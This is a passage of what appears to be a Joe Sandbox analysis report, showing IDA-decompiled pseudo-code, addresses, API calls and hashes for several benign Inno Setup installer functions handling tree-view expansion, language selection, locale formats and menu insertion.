						_t270 =  *((intOrPtr*)(__edx + 8)) + 0xc;
						__eflags =  *_t270 & 0x00000002;
						if(( *_t270 & 0x00000002) != 0) {
							_t270[6] =  *((intOrPtr*)( *_v8 + 0x84))(0);
						}
						__eflags =  *_t270 & 0x00000020;
						if(( *_t270 & 0x00000020) != 0) {
							_t270[7] =  *((intOrPtr*)( *_v8 + 0x84))(1);
						}
						__eflags =  *_t270 & 0x00000040;
						if(( *_t270 & 0x00000040) != 0) {
							E004181C8(_v8);
							_t136 = E00409A68();
							__eflags = _t136;
							_t270[8] = (_t136 & 0xffffff00 | _t136 != 0x00000000) & 0x0000007f;
							__eflags = _t270[8];
							if(_t270[8] == 0) {
								_t139 = _t270[9];
								__eflags =  *((char*)(_t139 + 4));
								if( *((char*)(_t139 + 4)) == 0) {
									_t142 =  *((intOrPtr*)( *_v8 + 0x8c))() & 0x0000007f;
									__eflags = _t142;
									_t270[8] = _t142;
								}
							}
						}
						 *_t270 =  *_t270 | 0x00001000;
					} else {
						_t245 = _t239 - 1;
						__eflags = _t245;
						if(_t245 == 0) {
							_t149 = _v8;
							__eflags =  *((char*)(_t149 + 0xfc));
							if( *((char*)(_t149 + 0xfc)) == 0) {
								E00462494(_v8, __edx, __edi, __esi);
							}
						} else {
							__eflags = _t245 - 0x190;
							if(__eflags == 0) {
								E00462520(_t220, __eflags, _t276);
								 *(_t216 + 0xc) = 1;
							}
						}
					}
					goto L51;
				} else {
					if(_t279 == 0) {
						_t153 = _v8;
						__eflags =  *((char*)(_t153 + 0x105));
						if( *((char*)(_t153 + 0x105)) != 0) {
							E00408BEC("Internal error: Item already expanding", 1);
							E0040311C();
						}
						 *((char*)(_v8 + 0x105)) = 1;
						_push(_t276);
						_push(0x46277d);
						_push( *[fs:eax]);
						 *[fs:eax] = _t278;
						_t271 =  *((intOrPtr*)(_t216 + 8));
						__eflags =  *((intOrPtr*)(_t271 + 0xc)) - 2;
						if( *((intOrPtr*)(_t271 + 0xc)) != 2) {
							L22:
							__eflags = 0;
							_pop(_t247);
							 *[fs:eax] = _t247;
							_push(0x462988);
							_t157 = _v8;
							 *((char*)(_t157 + 0x105)) = 0;
							return _t157;
						} else {
							_t158 =  *((intOrPtr*)(_t271 + 0x5c));
							__eflags =  *((char*)(_t158 + 5));
							if( *((char*)(_t158 + 5)) != 0) {
								goto L22;
							} else {
								_t159 =  *((intOrPtr*)(_t271 + 0x5c));
								__eflags =  *((char*)(_t159 + 4));
								if( *((char*)(_t159 + 4)) != 0) {
									goto L22;
								} else {
									 *((char*)( *((intOrPtr*)(_t271 + 0x5c)) + 5)) = 1;
									_v12 = SetCursor(LoadCursorA(0, 0x7f02));
									 *[fs:eax] = _t278;
									_t165 =  *((intOrPtr*)( *_v8 + 0x80))( *[fs:eax], 0x46275e, _t276);
									__eflags = _t165;
									if(_t165 == 0) {
										 *((char*)( *((intOrPtr*)(_t271 + 0x5c)) + 5)) = 0;
										 *(_t216 + 0xc) = 1;
									} else {
										E004181C8(_v8);
										_t172 = E00409A68();
										__eflags = _t172;
										if(_t172 == 0) {
											E004629DC(_v8, 0,  *((intOrPtr*)(_t271 + 0x3c)));
										}
									}
									__eflags = 0;
									_pop(_t249);
									 *[fs:eax] = _t249;
									_push(0x462765);
									return SetCursor(_v12);
								}
							}
						}
					} else {
						_t253 = _t238 - 0xfffffe61;
						if(_t253 == 0) {
							_t272 = _t129;
							__eflags =  *(_t272 + 0x14);
							if( *(_t272 + 0x14) != 0) {
								__eflags =  *(_t272 + 0x3c);
								if( *(_t272 + 0x3c) != 0) {
									E004181C8(_v8);
									_t183 = E00409A80();
									E004181C8(_v8);
									_t186 = E00409A80();
									__eflags = _t183 - _t186;
									if(_t183 != _t186) {
										_t111 = __edx + 0xc;
										 *_t111 =  *(__edx + 0xc) | 0x00000001;
										__eflags =  *_t111;
									}
								}
							}
							_t177 =  *(_t272 + 0x3c);
							__eflags = _t177;
							if(_t177 != 0) {
								_v60 = 8;
								_v56 = _t177;
								_v48 = 0x20;
								_t180 = E00409AD0(E004181C8(_v8),  &_v60);
								__eflags = _t180;
								if(_t180 != 0) {
									__eflags = _v52 & 0x00000020;
									if((_v52 & 0x00000020) != 0) {
										_t122 = _t216 + 0xc;
										 *_t122 =  *(_t216 + 0xc) | 0x00000002;
										__eflags =  *_t122;
									}
								}
							}
						} else {
							_t257 = _t253 - 4;
							if(_t257 == 0) {
								_t273 =  *((intOrPtr*)(__edx + 8)) + 0xc;
								_t188 =  *((intOrPtr*)(_t273 + 0x24));
								__eflags =  *((char*)(_t188 + 4));
								if( *((char*)(_t188 + 4)) != 0) {
									__eflags =  *(_t273 + 0x10);
									if( *(_t273 + 0x10) != 0) {
										E0040352C( &_v16,  *(_t273 + 0x10));
										_v17 = 1;
										_t191 = _v8;
										__eflags =  *((short*)(_t191 + 0x112));
										if( *((short*)(_t191 + 0x112)) != 0) {
											_t216 = _v8;
											 *((intOrPtr*)(_v8 + 0x110))( &_v17);
										}
										__eflags = _v17;
										if(_v17 != 0) {
											E00403450( *((intOrPtr*)(_t273 + 0x24)), _t216, _v16, _t267, _t273);
											_v60 = 1;
											_v56 =  *(_t273 + 4);
											_v44 = E00403738(_v16);
											E00409AE8(E004181C8(_v8),  &_v60);
											E004181C8(_v8);
											_push(E00409A80());
											_t204 = E004181C8(_v8);
											_pop(_t262);
											E00409B44(_t204, 0, _t262);
											E00462494(_v8, _t216, _t267, _t273);
										}
									}
								}
							} else {
								_t264 = _t257 - 1;
								if(_t264 == 0) {
									_t212 =  *((intOrPtr*)( *((intOrPtr*)(__edx + 8)) + 0x30));
									__eflags =  *((char*)(_t212 + 4));
									if( *((char*)(_t212 + 4)) == 0) {
										 *(__edx + 0xc) = 1;
									}
								} else {
									if(_t264 == 1) {
										E00403B94( *((intOrPtr*)(_t129 + 0x34)));
									}
								}
							}
						}
						L51:
						_pop(_t240);
						 *[fs:eax] = _t240;
						_push(0x4629a5);
						return E00403400( &_v16);
					}
				}
			}

0x004625e4
0x004625e5
0x004625e7
0x004625ef
0x004625f2
0x004625f4
0x00462602
0x0046260a
0x0046260c
0x0046260f
0x00462612
0x00462615
0x0046261b
0x00462643
0x00462643
0x00462649
0x00462787
0x0046278a
0x0046278d
0x004627a5
0x004627a5
0x004627a8
0x004627ab
0x004627c3
0x004627c3
0x004627c6
0x004627c9
0x004627ce
0x004627d6
0x004627db
0x004627e3
0x004627e6
0x004627ea
0x004627ec
0x004627ef
0x004627f3
0x00462803
0x00462803
0x00462806
0x00462806
0x004627f3
0x004627ea
0x00462809
0x0046264f
0x0046264f
0x0046264f
0x00462650
0x00462814
0x00462817
0x0046281e
0x00462827
0x00462827
0x00462656
0x00462656
0x0046265c
0x0046290b
0x00462911
0x00462911
0x0046265c
0x00462650
0x00000000
0x0046261d
0x0046261d
0x00462679
0x0046267c
0x00462683
0x00462691
0x00462696
0x00462696
0x0046269e
0x004626a7
0x004626a8
0x004626ad
0x004626b0
0x004626b3
0x004626b6
0x004626ba
0x00462765
0x00462765
0x00462767
0x0046276a
0x0046276d
0x00462772
0x00462775
0x0046277c
0x004626c0
0x004626c0
0x004626c3
0x004626c7
0x00000000
0x004626cd
0x004626cd
0x004626d0
0x004626d4
0x00000000
0x004626da
0x004626dd
0x004626f3
0x00462701
0x0046270c
0x00462712
0x00462714
0x0046273c
0x00462740
0x00462716
0x00462719
0x00462721
0x00462726
0x00462728
0x00462732
0x00462732
0x00462728
0x00462747
0x00462749
0x0046274c
0x0046274f
0x0046275d
0x0046275d
0x004626d4
0x004626c7
0x0046261f
0x0046261f
0x00462625
0x0046291a
0x0046291c
0x00462920
0x00462922
0x00462926
0x0046292b
0x00462933
0x0046293d
0x00462945
0x0046294a
0x0046294c
0x0046294e
0x0046294e
0x0046294e
0x0046294e
0x0046294c
0x00462926
0x00462952
0x00462955
0x00462957
0x00462959
0x00462960
0x00462963
0x00462975
0x0046297a
0x0046297c
0x0046297e
0x00462982
0x00462984
0x00462984
0x00462984
0x00462984
0x00462982
0x0046297c
0x0046262b
0x0046262b
0x0046262e
0x00462853
0x00462856
0x00462859
0x0046285d
0x00462863
0x00462867
0x00462873
0x00462878
0x0046287c
0x0046287f
0x00462887
0x00462890
0x0046289c
0x0046289c
0x004628a2
0x004628a6
0x004628b2
0x004628b7
0x004628c1
0x004628cc
0x004628da
0x004628e2
0x004628ef
0x004628f3
0x004628fa
0x004628fb
0x00462903
0x00462903
0x004628a6
0x00462867
0x00462634
0x00462634
0x00462635
0x00462837
0x0046283a
0x0046283e
0x00462844
0x00462844
0x0046263b
0x0046263c
0x0046266f
0x0046266f
0x0046263c
0x00462635
0x0046262e
0x00462988
0x0046298a
0x0046298d
0x00462990
0x0046299d
0x0046299d
0x0046261d

APIs

LoadCursorA.USER32 ref: 004626E8
SetCursor.USER32(00000000,00000000,00007F02,00000000,0046277D), ref: 004626EE
SetCursor.USER32(?,00462765,00007F02,00000000,0046277D), ref: 00462758

Strings

, xrefs: 0046297E
Internal error: Item already expanding, xrefs: 00462685
, xrefs: 00462963

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Cursor$Load
String ID: $ $Internal error: Item already expanding
API String ID: 1675784387-1948079669
Opcode ID: 2b4ca07bb9afc79652b9b90631f3cfab3ec5696c1e0434d634c2fbfa839246d9
Instruction ID: e6d2e44c9d05907f3e5b990cf56a20fd25f5602c78974bd8caf37cf2cf6e445b
Opcode Fuzzy Hash: 2b4ca07bb9afc79652b9b90631f3cfab3ec5696c1e0434d634c2fbfa839246d9
Instruction Fuzzy Hash: B2B1A230600A04EFD714DF25C685B9EBBF1BF44304F5884AAE845AB792E7B8AD45CB16

Uniqueness

Uniqueness Score: -1.00%

Function 00475374 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 200
windowCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E00475374(intOrPtr __ebx, void* __edi, intOrPtr __esi) {
				char _v5;
				intOrPtr _v12;
				long _v16;
				char _v20;
				char _v24;
				struct _WNDCLASSW _v64;
				char _v68;
				intOrPtr _t76;
				void* _t78;
				intOrPtr _t113;
				intOrPtr _t117;
				void* _t119;
				intOrPtr _t121;
				intOrPtr _t131;
				long _t140;
				intOrPtr _t153;
				intOrPtr _t156;
				intOrPtr _t165;
				intOrPtr _t167;
				void* _t187;
				void* _t188;
				intOrPtr _t189;
				void* _t194;
				void* _t208;

				_t185 = __esi;
				_t184 = __edi;
				_t154 = __ebx;
				_t187 = _t188;
				_t189 = _t188 + 0xffffffc0;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v68 = 0;
				_v16 = 0;
				_v20 = 0;
				_push(_t187);
				_push(0x475636);
				_push( *[fs:eax]);
				 *[fs:eax] = _t189;
				_t157 =  *0x49a628; // 0x2262410
				_v12 = E00475688(1, __edi);
				_push(_t187);
				_push(0x47560c);
				_push( *[fs:edx]);
				 *[fs:edx] = _t189;
				if( *0x4980dc == 2 && GetClassInfoW(0, L"COMBOBOX",  &_v64) != 0) {
					 *0x49b070 = _v64.lpfnWndProc;
					_push(E00475328);
					_push(0xfffffffc);
					_t153 = E004181C8( *((intOrPtr*)(_v12 + 0x1bc)));
					_push(_t153);
					L004061B4();
					 *0x49b074 = _t153;
				}
				_t76 =  *0x49b2e4; // 0x22679c0
				_t78 =  *((intOrPtr*)(_t76 + 8)) - 1;
				if(_t78 < 0) {
					L15:
					if(( *0x49b29f & 0x00000004) == 0 ||  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x1bc)) + 0xfc)))) + 0x10))() - 1 <= 0) {
						L23:
						if(E0042A028( *((intOrPtr*)(_v12 + 0x1bc))) + 1 == 0) {
							_t154 =  *((intOrPtr*)(_v12 + 0x1bc));
							_t167 =  *0x498c38; // 0x0
							E0042A044( *((intOrPtr*)(_v12 + 0x1bc)), E0040C0E0( *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x1bc)) + 0xfc)), _t167));
						}
						_t208 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x1bc)) + 0xfc)))) + 0x10))() - 1;
						if(_t208 <= 0) {
							_v5 = 1;
						} else {
							E00422E38(_v12, _t154, _t184, _t185);
							_v5 = _t208 == 0;
							if(_v5 != 0 && E0042A028( *((intOrPtr*)(_v12 + 0x1bc))) >= 0) {
								E0047C570( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x1bc)) + 0xfc)))) + 0x14))(),  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x1bc)) + 0xfc)))));
							}
						}
						_pop(_t165);
						 *[fs:eax] = _t165;
						_push(0x475613);
						return E00402B58(_v12);
					} else {
						_t113 =  *0x49b174; // 0x2278c64
						E0047AA00(_t113, _t157,  &_v68);
						E004775B8(_v68, _t154, 0, "Inno Setup: Language", _t184, _t185,  &_v20);
						if(_v20 == 0) {
							goto L23;
						}
						_t117 =  *0x49b2e4; // 0x22679c0
						_t119 =  *((intOrPtr*)(_t117 + 8)) - 1;
						if(_t119 < 0) {
							goto L23;
						}
						_v24 = _t119 + 1;
						_t154 = 0;
						while(1) {
							_t121 =  *0x49b2e4; // 0x22679c0
							if(E00406AA4(_v20,  *((intOrPtr*)(E0040B424(_t121, _t154)))) == 0) {
								break;
							}
							_t154 = _t154 + 1;
							_t50 =  &_v24;
							 *_t50 = _v24 - 1;
							if( *_t50 != 0) {
								continue;
							}
							goto L23;
						}
						_t185 =  *((intOrPtr*)(_v12 + 0x1bc));
						E0042A044( *((intOrPtr*)(_v12 + 0x1bc)), E0040C0E0( *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x1bc)) + 0xfc)), _t154));
						goto L23;
					}
				}
				_v24 = _t78 + 1;
				_t156 = 0;
				do {
					_t131 =  *0x49b2e4; // 0x22679c0
					_t185 = E0040B424(_t131, _t156);
					_t194 = _t156 -  *0x498c38; // 0x0
					if(_t194 == 0 ||  *((intOrPtr*)(_t185 + 0x2c)) == 0 || GetACP() ==  *((intOrPtr*)(_t185 + 0x2c)) || ( *0x49b29e & 0x00000080) != 0) {
						_t157 = 0x475664;
						E004035C0( &_v16, 0x475664,  *((intOrPtr*)(_t185 + 4)));
						if( *0x4980dc != 2) {
							E00403BA4();
							_t157 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x1bc)) + 0xfc))));
							_t140 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x1bc)) + 0xfc)))) + 0x2c))();
						} else {
							_t140 = SendMessageW(E004181C8( *((intOrPtr*)(_v12 + 0x1bc))), 0x143, 0, _v16);
						}
						if(_t140 >= 0) {
							_t157 = _t156;
							_t185 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x1bc)) + 0xfc))));
							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x1bc)) + 0xfc)))) + 0x20))();
						}
					}
					_t156 = _t156 + 1;
					_t32 =  &_v24;
					 *_t32 = _v24 - 1;
				} while ( *_t32 != 0);
				goto L15;
			}

0x00475374
0x00475374
0x00475374
0x00475375
0x00475377
0x0047537a
0x0047537b
0x0047537c
0x0047537f
0x00475382
0x00475385
0x0047538a
0x0047538b
0x00475390
0x00475393
0x00475396
0x004753a8
0x004753ad
0x004753ae
0x004753b3
0x004753b6
0x004753c0
0x004753d9
0x004753de
0x004753e3
0x004753ee
0x004753f3
0x004753f4
0x004753f9
0x004753f9
0x004753fe
0x00475406
0x00475409
0x004754c5
0x004754cc
0x00475563
0x00475572
0x00475577
0x00475583
0x00475592
0x00475592
0x004755ab
0x004755ac
0x004755f2
0x004755ae
0x004755b1
0x004755b7
0x004755bf
0x004755eb
0x004755eb
0x004755bf
0x004755f8
0x004755fb
0x004755fe
0x0047560b
0x004754e9
0x004754f0
0x004754f5
0x00475504
0x0047550d
0x00000000
0x00000000
0x0047550f
0x00475517
0x0047551a
0x00000000
0x00000000
0x0047551d
0x00475520
0x00475522
0x00475524
0x0047553a
0x00000000
0x00000000
0x0047555d
0x0047555e
0x0047555e
0x00475561
0x00000000
0x00000000
0x00000000
0x00475561
0x0047553f
0x00475556
0x00000000
0x00475556
0x004754cc
0x00475410
0x00475413
0x00475415
0x00475417
0x00475421
0x00475423
0x00475429
0x00475447
0x0047544f
0x0047545b
0x00475484
0x0047549b
0x0047549d
0x0047545d
0x00475477
0x00475477
0x004754a2
0x004754b3
0x004754b6
0x004754b8
0x004754b8
0x004754a2
0x004754bb
0x004754bc
0x004754bc
0x004754bc
0x00000000

APIs

GetClassInfoW.USER32 ref: 004753CD
740BB5A0.USER32(00000000,000000FC,00475328,00000000,COMBOBOX,?,00000000,0047560C,?,00000000,00475636), ref: 004753F4
GetACP.KERNEL32(00000000,0047560C,?,00000000,00475636), ref: 00475431
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00475477

Strings

Inno Setup: Language, xrefs: 004754FF
COMBOBOX, xrefs: 004753C6

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ClassInfoMessageSend
String ID: COMBOBOX$Inno Setup: Language
API String ID: 1455646776-4234151509
Opcode ID: 5775e3af7ae234138f485d1e83d200eb90e5ff2bfade9b773f05fd1c6452f7ef
Instruction ID: e8c162543c025322b71b50dd9b098b1ebc250f955d8e3c075c53d9fee39e0ead
Opcode Fuzzy Hash: 5775e3af7ae234138f485d1e83d200eb90e5ff2bfade9b773f05fd1c6452f7ef
Instruction Fuzzy Hash: 55813C34A00645DFCB10DF69D985AAEB7F1EB09304F5581BBE808DB362D7B8AD41CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00408700 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 167
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E00408700(void* __ebx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				intOrPtr _t148;
				intOrPtr _t156;

				_t153 = __esi;
				_t152 = __edi;
				_push(0);
				_push(0);
				_push(0);
				_push(__esi);
				_push(__edi);
				_push(_t156);
				_push(0x408948);
				_push( *[fs:eax]);
				 *[fs:eax] = _t156;
				_t104 = GetSystemDefaultLCID();
				E00408548(_t31, 0, 0x14,  &_v16);
				E00403450(0x49a498, _t104, _v16, __edi, __esi);
				E00408548(_t104, 0x408960, 0x1b,  &_v16);
				 *0x49a49c = E00406DB4(0x408960, 0);
				E00408548(_t104, 0x408960, 0x1c,  &_v16);
				 *0x49a49d = E00406DB4(0x408960, 0);
				 *0x49a49e = E00408594(_t104, 0x2c, 0xf);
				 *0x49a49f = E00408594(_t104, 0x2e, 0xe);
				E00408548(_t104, 0x408960, 0x19,  &_v16);
				 *0x49a4a0 = E00406DB4(0x408960, 0);
				 *0x49a4a1 = E00408594(_t104, 0x2f, 0x1d);
				E00408548(_t104, "m/d/yy", 0x1f,  &_v16);
				E00403450(0x49a4a4, _t104, _v16, _t152, _t153);
				E00408548(_t104, "mmmm d, yyyy", 0x20,  &_v16);
				E00403450(0x49a4a8, _t104, _v16, _t152, _t153);
				 *0x49a4ac = E00408594(_t104, 0x3a, 0x1e);
				E00408548(_t104, 0x408994, 0x28,  &_v16);
				E00403450(0x49a4b0, _t104, _v16, _t152, _t153);
				E00408548(_t104, 0x4089a0, 0x29,  &_v16);
				E00403450(0x49a4b4, _t104, _v16, _t152, _t153);
				E00408548(_t104, 0x408960, 0x25,  &_v16);
				if(E00406DB4(0x408960, 0) != 0) {
					E00403494( &_v8, 0x4089b8);
				} else {
					E00403494( &_v8, 0x4089ac);
				}
				E00408548(_t104, 0x408960, 0x23,  &_v16);
				if(E00406DB4(0x408960, 0) != 0) {
					E00403400( &_v12);
				} else {
					E00403494( &_v12, 0x4089c4);
				}
				_push(_v8);
				_push(":mm");
				_push(_v12);
				E00403634();
				_push(_v8);
				_push(":mm:ss");
				_push(_v12);
				E00403634();
				_pop(_t148);
				 *[fs:eax] = _t148;
				_push(E0040894F);
				return E00403420( &_v16, 3);
			}

0x00408700
0x00408700
0x00408703
0x00408705
0x00408707
0x0040870a
0x0040870b
0x0040870e
0x0040870f
0x00408714
0x00408717
0x0040871f
0x0040872e
0x0040873b
0x00408750
0x0040875f
0x00408774
0x00408783
0x00408796
0x004087a9
0x004087be
0x004087cd
0x004087e0
0x004087f5
0x00408802
0x00408817
0x00408824
0x00408837
0x0040884c
0x00408859
0x0040886e
0x0040887b
0x00408890
0x004088a1
0x004088ba
0x004088a3
0x004088ab
0x004088ab
0x004088cf
0x004088e0
0x004088f4
0x004088e2
0x004088ea
0x004088ea
0x004088f9
0x004088fc
0x00408901
0x0040890e
0x00408913
0x00408916
0x0040891b
0x00408928
0x0040892f
0x00408932
0x00408935
0x00408947

APIs

GetSystemDefaultLCID.KERNEL32(00000000,00408948,?,?,?,?,00000000,00000000,00000000,?,0040994F,00000000,00409962), ref: 0040871A

Part of subcall function 00408548: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049A4C0,00000001,?,00408613,?,00000000,004086F2), ref: 00408566

Part of subcall function 00408594: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,00408796,?,?,?,00000000,00408948), ref: 004085A7

Strings

m/d/yy, xrefs: 004087E9
AMPM, xrefs: 004088E5
mmmm d, yyyy, xrefs: 0040880B
:mm, xrefs: 004088FC
:mm:ss, xrefs: 00408916

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: InfoLocale$DefaultSystem
String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
API String ID: 1044490935-665933166
Opcode ID: d7fa7bddb22e1db07ca528e226100c54cebd64a2cae894e02a576bc154f01e76
Instruction ID: df00404fec8d0a2a4b2d995664e5cd1aa7504ef27e6d614469d6daf0beab5ab3
Opcode Fuzzy Hash: d7fa7bddb22e1db07ca528e226100c54cebd64a2cae894e02a576bc154f01e76
Instruction Fuzzy Hash: F3512F24B00148ABDB01FBA5CD4169E7769DB88308F50D47FA181BB3C6DE3CDA15875E

Uniqueness

Uniqueness Score: -1.00%

Function 004116DC Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 158
windowCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E004116DC(void* __eax, void* __ebx, struct HMENU__* __edx, void* __edi, intOrPtr __esi) {
				char _v8;
				struct tagMENUITEMINFOA _v52;
				char _v56;
				intOrPtr _t91;
				CHAR* _t97;
				short _t128;
				void* _t132;
				intOrPtr _t139;
				struct HMENU__* _t159;
				int _t163;
				void* _t167;
				void* _t171;

				_t160 = __esi;
				_push(__esi);
				_push(__edi);
				_v56 = 0;
				_v8 = 0;
				_t159 = __edx;
				_t132 = __eax;
				_push(_t167);
				_push(0x4118e1);
				_push( *[fs:eax]);
				 *[fs:eax] = _t167 + 0xffffffcc;
				if( *((char*)(__eax + 0x2c)) == 0) {
					L15:
					_pop(_t139);
					 *[fs:eax] = _t139;
					_push(E004118E8);
					E00403400( &_v56);
					return E00403400( &_v8);
				}
				E00403494( &_v8,  *((intOrPtr*)(__eax + 0x20)));
				if(E00411C84(_t132) <= 0) {
					__eflags =  *((short*)(_t132 + 0x40));
					if( *((short*)(_t132 + 0x40)) == 0) {
						L8:
						_t171 = (GetVersion() & 0x000000ff) - 4;
						if(_t171 < 0) {
							_t163 =  *(0x498294 + ((E00403684( *((intOrPtr*)(_t132 + 0x20)), E00411904) & 0xffffff00 | __eflags == 0x00000000) & 0x0000007f) * 4) |  *0x00498288 |  *0x00498278 |  *0x00498280 | 0x00000400;
							_t91 = E00411C84(_t132);
							__eflags = _t91;
							if(_t91 <= 0) {
								InsertMenuA(_t159, 0xffffffff, _t163,  *(_t132 + 0x30) & 0x0000ffff, E00403738(_v8));
							} else {
								_t97 = E00403738( *((intOrPtr*)(_t132 + 0x20)));
								InsertMenuA(_t159, 0xffffffff, _t163 | 0x00000010, E00411A94(_t132, _t159, _t163), _t97);
							}
						} else {
							_v52.cbSize = 0x2c;
							_v52.fMask = 0x3f;
							_v52.fType =  *(0x4982c8 + ((E00403684( *((intOrPtr*)(_t132 + 0x20)), E00411904) & 0xffffff00 | _t171 == 0x00000000) & 0x0000007f) * 4) |  *0x004982C0 |  *0x0049829C;
							_v52.fState =  *0x004982A8 |  *0x004982B8 |  *0x004982B0;
							_v52.wID =  *(_t132 + 0x30) & 0x0000ffff;
							_v52.hSubMenu = 0;
							_v52.hbmpChecked = 0;
							_v52.hbmpUnchecked = 0;
							_v52.dwTypeData = E00403738(_v8);
							if(E00411C84(_t132) > 0) {
								_v52.hSubMenu = E00411A94(_t132, _t159, _t160);
							}
							InsertMenuItemA(_t159, 0xffffffff, 1,  &_v52);
						}
						goto L15;
					}
					_t160 =  *((intOrPtr*)(_t132 + 0x44));
					__eflags = _t160;
					if(_t160 == 0) {
						L7:
						_push(_v8);
						_push(0x4118f8);
						E004110C0( *((intOrPtr*)(_t132 + 0x40)), _t132, 0,  &_v56, _t159, _t160);
						_push(_v56);
						E00403634();
						goto L8;
					}
					__eflags =  *((intOrPtr*)(_t160 + 0x44));
					if( *((intOrPtr*)(_t160 + 0x44)) != 0) {
						goto L7;
					}
					_t128 = E00402BA0( *((intOrPtr*)(_t160 + 4)), 0x410db0);
					__eflags = _t128;
					if(_t128 != 0) {
						goto L8;
					}
					goto L7;
				}
				_v52.hSubMenu = E00411A94(_t132, _t159, __esi);
				goto L8;
			}

0x004116dc
0x004116e3
0x004116e4
0x004116e7
0x004116ea
0x004116ed
0x004116ef
0x004116f3
0x004116f4
0x004116f9
0x004116fc
0x00411703
0x004118c3
0x004118c5
0x004118c8
0x004118cb
0x004118d3
0x004118e0
0x004118e0
0x0041170f
0x0041171d
0x0041172b
0x00411730
0x00411774
0x0041177d
0x00411781
0x0041187c
0x00411884
0x00411889
0x0041188b
0x004118be
0x0041188d
0x00411890
0x004118a5
0x004118a5
0x00411787
0x00411787
0x0041178e
0x004117c9
0x004117f0
0x004117f7
0x004117fc
0x00411801
0x00411806
0x00411811
0x0041181d
0x00411826
0x00411826
0x00411832
0x00411832
0x00000000
0x00411781
0x00411732
0x00411735
0x00411737
0x00411750
0x00411750
0x00411753
0x0041175f
0x00411764
0x0041176f
0x00000000
0x0041176f
0x00411739
0x0041173d
0x00000000
0x00000000
0x00411747
0x0041174c
0x0041174e
0x00000000
0x00000000
0x00000000
0x0041174e
0x00411726
0x00000000

APIs

GetVersion.KERNEL32(00000000,004118E1), ref: 00411774
InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 00411832

Part of subcall function 00411A94: CreatePopupMenu.USER32(?,0041189D,00000000,00000000,004118E1), ref: 00411AAE

InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 004118BE

Part of subcall function 00411A94: CreateMenu.USER32(?,0041189D,00000000,00000000,004118E1), ref: 00411AB8

InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 004118A5

Strings

?, xrefs: 0041178E
,, xrefs: 00411787

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

